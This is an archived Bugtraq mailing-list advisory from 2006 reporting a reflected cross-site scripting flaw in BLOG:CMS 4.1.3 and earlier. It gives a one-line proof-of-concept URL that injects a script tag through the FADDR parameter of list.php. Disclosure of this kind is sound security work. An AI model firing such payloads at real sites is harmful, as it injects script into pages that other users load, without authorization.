[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    BLOG:CMS <= 4.1.3 XSS
From:       katatafish () hush ! com
Date:       2006-11-18 14:40:43
Message-ID: 20061118144043.597.qmail () securityfocus ! com
[Download RAW message or body]

Version: 4.1.3 and prior
-----------------------------

Proof of Concept
----------------
http://[host]/[path]/list.php?FADDR="><script>alert("XSS");</script>

katatafish (at) hush (dot) com
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic